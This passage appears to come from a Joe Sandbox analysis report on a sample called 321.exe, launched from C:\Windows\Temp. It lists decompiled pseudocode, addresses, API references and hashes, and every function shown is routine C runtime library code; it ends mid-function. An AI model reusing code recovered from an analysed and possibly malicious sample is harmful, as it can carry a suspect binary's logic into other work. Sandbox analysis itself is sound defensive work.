0x0138ca61
0x0138ca64
0x0138ca6a
0x0138ca6c
0x0138caca
0x0138cad0
0x0138cad8
0x0138cadd
0x0138cae3
0x0138cae4
0x00000000
0x00000000
0x00000000
0x0138ca3d
0x0138ca3d
0x0138ca40
0x0138ca42
0x00000000
0x0138ca44
0x0138ca44
0x0138ca47
0x00000000
0x0138ca49
0x0138ca49
0x0138ca4c
0x00000000
0x00000000
0x00000000
0x00000000
0x0138ca4c
0x0138ca47
0x0138ca42
0x0138cae6
0x0138cae7
0x00000000
0x0138ca6e
0x0138ca6e
0x0138ca74
0x0138ca7c
0x0138ca81
0x0138ca90
0x0138ca90
0x0138ca98
0x0138ca9e
0x0138caa4
0x0138caab
0x0138caae
0x0138cab0
0x0138cac0
0x0138cac5
0x00000000
0x0138c9b9
0x0138c9b9
0x0138c9bf
0x0138c9c0
0x0138c9c1
0x0138c9c2
0x0138c9ca
0x0138c9ca
0x0138caed
0x0138caed
0x0138caf4
0x0138caf5
0x0138cafd
0x0138cb02
0x0138cb03
0x0138c915
0x0138c915
0x0138c918
0x0138c91a
0x0138c92f
0x00000000
0x0138c91c
0x0138c91c
0x0138c91f
0x0138c920
0x0138c921
0x0138c922
0x0138c927
0x0138c91a
0x0138cb08
0x0138cb09
0x0138cb0b
0x0138cb12
0x00000000
0x00000000
0x00000000
0x0138c85d
0x0138c830
0x0138c832
0x0138c833
0x0138c835
0x0138c835
0x00000000
0x00000000
0x00000000
0x00000000
0x0138c78e
0x0138c78e
0x0138c794
0x0138c797
0x0138c79a
0x0138c79d
0x0138c7a0
0x0138c7a3
0x0138c7a6
0x0138c7a6
0x00000000
0x0138c757
0x0138c725
0x0138c725
0x0138c728
0x0138c7b5
0x0138c7b6
0x0138c7bb
0x00000000
0x0138c7bb
0x0138c65c
0x0138c65c
0x0138c65f
0x0138c667
0x0138c66a
0x0138c671
0x0138c673
0x0138c675
0x0138c690
0x0138c691
0x0138c692
0x0138c693
0x0138c698
0x0138c69b
0x0138c69e
0x0138c677
0x0138c677
0x0138c67a
0x0138c67b
0x0138c67c
0x0138c67d
0x0138c67e
0x0138c683
0x0138c685
0x0138c688
0x0138c688
0x0138c6a0
0x0138c6a2
0x00000000
0x00000000
0x0138c6ab
0x0138c6ae
0x0138c6b1
0x0138c6b3
0x0138c6b5
0x00000000
0x0138c6b7
0x0138c6b7
0x0138c6ba
0x00000000
0x0138c6ba
0x00000000
0x0138c6b5
0x0138c730
0x0138c7bc
0x0138c7bf
0x0138c7c3
0x0138c7cc
0x0138c7cf
0x0138c7d3
0x0138c7d3
0x0138c7d5
0x0138c7d8
0x0138c7da
0x0138c7dc
0x0138c7de
0x0138c7e3
0x0138c7e4
0x0138c7e8
0x0138c7e8
0x0138c7ec
0x0138c7ef
0x0138c7ef
0x0138c7f3
0x00000000
0x0138c7fa
0x0138c62c
0x0138c62c
0x0138c633
0x0138c634
0x0138c636
0x0138c7fb
0x0138c7ff
0x0138c7ff
0x00000000

APIs

_strpbrk.LIBCMT ref: 0138C66A
_free.LIBCMT ref: 0138C7B6

Strings

*?, xrefs: 0138C65F

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: c66b5f97caf254190b3924c3821d8b89329301fe7e6a64137efe767deee30958
Instruction ID: ef3d343a27b22de2375367dc2b381b161d13755b84053710dc92f440a7155bb9
Opcode Fuzzy Hash: c66b5f97caf254190b3924c3821d8b89329301fe7e6a64137efe767deee30958
Instruction Fuzzy Hash: EC610DB5D002199FDB15EFACC8805EDFBF5EF48228B25916AE815E7300D735AE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0138CBE1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0138CBE1(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E0138C142(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E0138C142(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E0137FCEE(GetLastError());
									_t17 =  *((intOrPtr*)(E0137FD24(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E013827F2(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0137FCEE(GetLastError());
						_t17 =  *((intOrPtr*)(E0137FD24(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E013827F2(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E01382877(_a8);
				return 0;
			}

0x0138cbe7
0x0138cbec
0x0138cc00
0x0138cc03
0x0138cc35
0x0138cc3d
0x0138cc3f
0x0138cc58
0x0138cc5b
0x0138cc5e
0x0138cc6c
0x0138cc7b
0x0138cc83
0x0138cc85
0x0138cc9e
0x0138cca1
0x0138cca1
0x0138cc87
0x0138cc8e
0x0138cc99
0x0138cc99
0x0138cca3
0x0138cca4
0x00000000
0x0138cca4
0x0138cc63
0x0138cc68
0x0138cc6a
0x00000000
0x00000000
0x00000000
0x0138cc6a
0x0138cc48
0x0138cc53
0x00000000
0x0138cc53
0x0138cc05
0x0138cc08
0x0138cc0b
0x0138cc1e
0x0138cc21
0x0138cc23
0x0138cc25
0x00000000
0x0138cc25
0x0138cc11
0x0138cc16
0x0138cc18
0x00000000
0x00000000
0x00000000
0x0138cc18
0x0138cbf1
0x00000000

Strings

C:\Windows\Temp\321.exe, xrefs: 0138CBE6

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID:
String ID: C:\Windows\Temp\321.exe
API String ID: 0-1073121528
Opcode ID: ee108c777e54bb9cb9525879210536e1888df0763b22c97291e296d25dce1235
Instruction ID: c811bf177973f43eb99c291d57fc9e68fef752a6c375ac8e36ab49c4a38bdf6a
Opcode Fuzzy Hash: ee108c777e54bb9cb9525879210536e1888df0763b22c97291e296d25dce1235
Instruction Fuzzy Hash: BD218EB120470AAFDF21BF69DD849ABB7BDBF102AC7105615F82597151E731DC4287B0

Uniqueness

Uniqueness Score: -1.00%

Function 013832D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E013832D6(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1394134(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x013832dc
0x013832e0
0x013832eb
0x013832f3
0x013832fe
0x01383304
0x01383308
0x0138330f
0x01383315
0x01383315
0x01383317
0x0138331c
0x00000000
0x01383321
0x01383328

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01383288,?,?,01383250,00000000,00000000,?), ref: 013832EB
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 013832FE
FreeLibrary.KERNEL32(00000000,?,?,01383288,?,?,01383250,00000000,00000000,?), ref: 01383321

Strings

CorExitProcess, xrefs: 013832F6
mscoree.dll, xrefs: 013832E4

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: fb53239ef6871ba9fefa60a26df133b73bcb9533529e40d36a72ebc25001f33f
Instruction ID: 6b0b7ffc5fe624acc203007dedfa51f38cc5d945ff83e45a2bd96faf79807865
Opcode Fuzzy Hash: fb53239ef6871ba9fefa60a26df133b73bcb9533529e40d36a72ebc25001f33f
Instruction Fuzzy Hash: B0F01271501319FBDB21AB55DE0AB9DBE7DEB00B5AF140054F505A1350CB71CE01DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0138E0CB Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0138E0CB(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x13a3070; // 0x13a30c4
					if(_t23 != 0) {
						E013871B2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x13a3074; // 0x14a5a5c
					if(_t24 != 0) {
						E013871B2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x13a3078; // 0x14a5a5c
					if(_t25 != 0) {
						E013871B2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x13a30a0; // 0x13a30c8
					if(_t26 != 0) {
						E013871B2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x13a30a4; // 0x14a5a60
					if(_t27 != 0) {
						return E013871B2(_t6);
					}
				}
				return _t6;
			}

0x0138e0d1
0x0138e0d6
0x0138e0da
0x0138e0e0
0x0138e0e3
0x0138e0e8
0x0138e0ec
0x0138e0f2
0x0138e0f5
0x0138e0fa
0x0138e0fe
0x0138e104
0x0138e107
0x0138e10c
0x0138e110
0x0138e116
0x0138e119
0x0138e11e
0x0138e11f
0x0138e122
0x0138e128
0x00000000
0x0138e130
0x0138e128
0x0138e133

APIs

_free.LIBCMT ref: 0138E0E3

Part of subcall function 013871B2: HeapFree.KERNEL32(00000000,00000000,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?), ref: 013871C8
Part of subcall function 013871B2: GetLastError.KERNEL32(?,?,0138E36C,?,00000000,?,?,?,0138E60F,?,00000007,?,?,0138EB02,?,?), ref: 013871DA

_free.LIBCMT ref: 0138E0F5
_free.LIBCMT ref: 0138E107
_free.LIBCMT ref: 0138E119
_free.LIBCMT ref: 0138E12B

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d06e8c634d40f71d3522931c74894d29e665733f6c7b7a27caff87d9aee96427
Instruction ID: d938da705dcf960fb9b462c42502617379d6b253328efc3543cc168e45ded9ca
Opcode Fuzzy Hash: d06e8c634d40f71d3522931c74894d29e665733f6c7b7a27caff87d9aee96427
Instruction Fuzzy Hash: B4F01D72644711ABD670FB6DF489C5ABBEFBA00718BE44815F549D7A44CB34F8C48B60

Uniqueness

Uniqueness Score: -1.00%

Function 0145DCF2 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0145DD0A
_free.LIBCMT ref: 0145DD1C
_free.LIBCMT ref: 0145DD2E
_free.LIBCMT ref: 0145DD40
_free.LIBCMT ref: 0145DD52

Memory Dump Source

Source File: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: cf5792fb6303b9d0f0aa87de9d0885c78de37bd25fa2d614258b6dcb006507c7
Instruction ID: 23c3683f32c3cadac3335448fe2bcac4229919046f34df4bca34cfc93651f8ce
Opcode Fuzzy Hash: cf5792fb6303b9d0f0aa87de9d0885c78de37bd25fa2d614258b6dcb006507c7
Instruction Fuzzy Hash: BAF04F72900604A7E660EBADF5C1C2A7BD9AE543117A4080AF508D7622C630F888CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0137B94D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E0137B94D(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_t75 = E0137B22C(_t96, __ecx, __edx, _t113, _t121, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E0137B22C(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E013794C6(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E013793F9(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E0137B528(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E013824F9(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x0137b94d
0x0137b94d
0x0137b954
0x0137b95d
0x0137ba7c
0x0137b963
0x0137b965
0x0137b96f
0x0137b972
0x0137b978
0x0137b982
0x0137b9a7
0x0137b9ac
0x0137b9b1
0x0137ba78
0x00000000
0x0137ba79
0x0137b9b1
0x0137b982
0x0137b9b7
0x0137b9ba
0x0137b9bd
0x0137b9c3
0x0137b9c9
0x0137b9db
0x0137b9e0
0x0137b9e3
0x0137b9e6
0x0137b9e9
0x0137b9ec
0x0137b9f2
0x0137b9f8
0x0137b9fb
0x0137b9fe
0x0137ba0d
0x0137ba0e
0x0137ba0e
0x0137ba13
0x0137ba26
0x0137ba28
0x0137ba2d
0x0137ba38
0x0137ba3a
0x0137ba3c
0x0137ba58
0x0137ba5d
0x0137ba60
0x0137ba60
0x0137ba38
0x0137ba2d
0x0137ba66
0x0137ba67
0x0137ba6a
0x0137ba6d
0x0137ba70
0x0137ba73
0x0137b9fe
0x00000000
0x0137b9f2
0x0137ba7d
0x0137ba82
0x0137ba86
0x0137ba89
0x0137ba8a
0x0137ba8b
0x0137ba8c
0x0137ba91
0x0137bb09
0x0137bb0b
0x0137ba93
0x0137ba93
0x0137ba99
0x00000000
0x0137ba9b
0x0137ba9e
0x0137baa1
0x0137baa8
0x0137baab
0x0137baaf
0x0137bae1
0x0137bae4
0x0137baeb
0x0137baf1
0x0137bafb
0x0137bb04
0x0137bb04
0x0137bafb
0x0137baf1
0x0137bb05
0x0137bab1
0x0137bab1
0x0137bab1
0x0137bab4
0x0137bab4
0x0137bab8
0x00000000
0x00000000
0x0137babc
0x0137bad0
0x0137bad0
0x0137babe
0x0137babe
0x0137bac4
0x00000000
0x0137bac6
0x0137bac6
0x0137bac9
0x0137bace
0x00000000
0x00000000
0x00000000
0x00000000
0x0137bace
0x0137bac4
0x0137bad9
0x0137badb
0x00000000
0x0137badd
0x0137badd
0x0137badd
0x00000000
0x0137badb
0x0137bad4
0x0137bad6
0x00000000
0x0137bad6
0x00000000
0x00000000
0x00000000
0x0137baa1
0x0137ba99
0x0137bb0c
0x0137bb10
0x0137bb10

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0137B972
CatchIt.LIBVCRUNTIME ref: 0137BA58

Strings

RCC, xrefs: 0137B98C
MOC, xrefs: 0137B984

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: c674f9f42cf5457d492ac15cb01f7728bc7ee0b3f6988ee60b99f425685b3576
Instruction ID: a5326cc5c0e083d9b2ec7f3a4aa6af5222deaad5874106094d96a01e295b5570
Opcode Fuzzy Hash: c674f9f42cf5457d492ac15cb01f7728bc7ee0b3f6988ee60b99f425685b3576
Instruction Fuzzy Hash: 71415972900209EFDF26EF9CC880AEEBBB5BF48309F184159FA14A7265D3399951DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0137C382 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0137C382(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E01385868(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x0137c38f
0x0137c397
0x0137c3cc
0x0137c399
0x0137c3a2
0x00000000
0x0137c3c9
0x0137c3c8
0x0137c3c8

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0137C333,00000000,?,014A59E4,?,?,?,0137C4D6,00000004,InitializeCriticalSectionEx,01395BB0,InitializeCriticalSectionEx), ref: 0137C38F
GetLastError.KERNEL32(?,0137C333,00000000,?,014A59E4,?,?,?,0137C4D6,00000004,InitializeCriticalSectionEx,01395BB0,InitializeCriticalSectionEx,00000000,?,0137C28D), ref: 0137C399
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0137C3C1

Strings

api-ms-, xrefs: 0137C3A6

Memory Dump Source

Source File: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 71ee939f338d99e09664cc844abc2d127414b5bf36a4d9b07690584fe6a60717
Instruction ID: 7bbd3d6e3d945d1819075c21c63f6eeade582e524d5b6feecf28d26d1d9bdaa3
Opcode Fuzzy Hash: 71ee939f338d99e09664cc844abc2d127414b5bf36a4d9b07690584fe6a60717
Instruction Fuzzy Hash: 66E04F31384309B7FF312E75ED0AB1C3F98AB00B48F101021FA0CE81D5E7AAD9628A84

Uniqueness

Uniqueness Score: -1.00%

Function 01452313 Relevance: 6.3, APIs: 4, Instructions: 302COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.281900158.00000000013A3000.00000004.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true

Associated: 00000002.00000002.280939181.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281026800.0000000001371000.00000020.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.281545635.0000000001394000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.284995880.00000000014A4000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285035285.00000000014A5000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.285069288.00000000014A7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1370000_321.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fac41300f9d2f0dcc0f0d1756a681003a718fab01cd853093429f4ae3c5812
Instruction ID: 1121e1f576228a2c41605865b1c5da725bb5a80a1e23204eaddda0a84fd1c36d
Opcode Fuzzy Hash: f1fac41300f9d2f0dcc0f0d1756a681003a718fab01cd853093429f4ae3c5812
Instruction Fuzzy Hash: 75C1D270E0420AEFDB55CF9DC890FAE7BB1AFA9314F04415BE905A73A2C7B09941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0137B351 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E0137B351(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x13a2168);
				E013786F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
